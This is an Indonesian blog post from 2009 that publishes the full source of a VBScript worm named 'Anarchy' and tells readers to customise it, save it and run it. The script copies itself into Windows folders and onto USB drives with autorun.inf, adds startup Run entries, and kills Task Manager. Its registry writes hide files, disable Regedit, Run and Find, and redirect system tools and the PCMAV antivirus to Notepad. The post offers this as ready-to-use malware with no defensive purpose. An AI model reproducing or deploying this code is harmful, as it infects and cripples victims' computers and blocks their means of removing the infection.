Ni Adalah Sebuah Script Virus Vbs Yang Sangat Sederhana Virus Ni Dapat Di Ubah Di Tambah Dengan Selera Anda Masing2, Untuk Mempersingkat Waktu Dan Biar Gak Banyak Bacot Ni Scriptnya :
'Anarchy - not - Death
'
on error resume next
'Dim kata-kata berikut
dim rekur,windowpath,flash,anarki,af,autrn,at,rgdt,an,check,ad
'siapkan isi autorun
autrn = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Anarchy.dll.vbs" & vbcrlf & "open=Anarchy.dll.vbs"
set anarki = createobject("Scripting.FileSystemObject")
set af = anarki.getfile(Wscript.ScriptFullname)
dim text,size
size = af.size
check = af.drive.drivetype
set text = af.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'buat file induk
Set dirwin = anarki.GetSpecialFolder(0)
Set dirsystem = anarki.GetSpecialFolder(1)
Set dirtemp = anarki.GetSpecialFolder(2)
Set ac = anarki.GetFile(WScript.ScriptFullName)
ac.Copy(dirsystem&"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
ac.Copy(dirwin&"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
ac.Copy(dirsystem&"\pubprn.vbs")
ac.attributes =4
ac.attributes =2
'sebar ke removable disc ditambahkan dengan Autorun.inf
for each flash in anarki.drives
If (flash.drivetype = 1 or flash.drivetype = 2) and flash.path <> "A:" then
set at=anarki.getfile(flash.path &"\Anarchy.dll.vbs”")
ac.attributes =4
ac.attributes =2
set at=anarki.createtextfile(flash.path &"\Anarchy.dll.vbs",2,true)
at.write rekur
at.close
set at=anarki.getfile(flash.path &"\Anarchy.dll.vbs")
ac.attributes =4
ac.attributes =2
set at =anarki.getfile(flash.path &"\autorun.inf")
ac.attributes =4
ac.attributes =2
set at=anarki.createtextfile(flash.path &"\autorun.inf",2,true)
at.write autrn
at.close
set at = anarki.getfile(flash.path &"\autorun.inf")
ac.attributes =4
ac.attributes =2
end if
wscr.exec("c:/Anarchy.dll.vbs")
wscr.exec(dirwin&"\Anarchy.dll.vbs")
wscr.exec(dirsystem&"\Anarchy.dll.vbs")
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
'Manipulasi Registry
set rgdt = createobject("WScript.Shell")
'Ubah IE Title
rgdt.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",".:: AnarchyX ::."
'File Hidden tak terlihat
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
'Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1", "REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu","1","REG_DWORD"
rgdt.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Hidden","1","REG_DWORD"
on error resume next
'Aktifkan saat Windows Startup
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyW", "C:\WINDOWS\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyS", "C:\WINDOWS\system32\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyC", "C:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyD", "D:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyE", "E:\Anarchy.dll.vbs", "REG_SZ"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\anarchyF", "F:\Anarchy.dll.vbs", "REG_SZ"
'Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
rgdt.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
'Bonus
if check <> 1 then
Wscript.sleep 1500
end if
next
loop while check <> 1
set ad = createobject("Wscript.shell")
ad.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Copy - Paste Ke NotepAd SAve Dengan Nama Anarchy.dll.vbs Ke directory Yang Anda Inginkan Sebagai Contoh C:\Anarchy\ Kemudian Jalankan Untuk Mengetahui Fungsi Kerja Virus Ini
Good Luck
Minggu, 31 Mei 2009
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar
Komentar Yang Bernilai Negatif Akan Di Hapus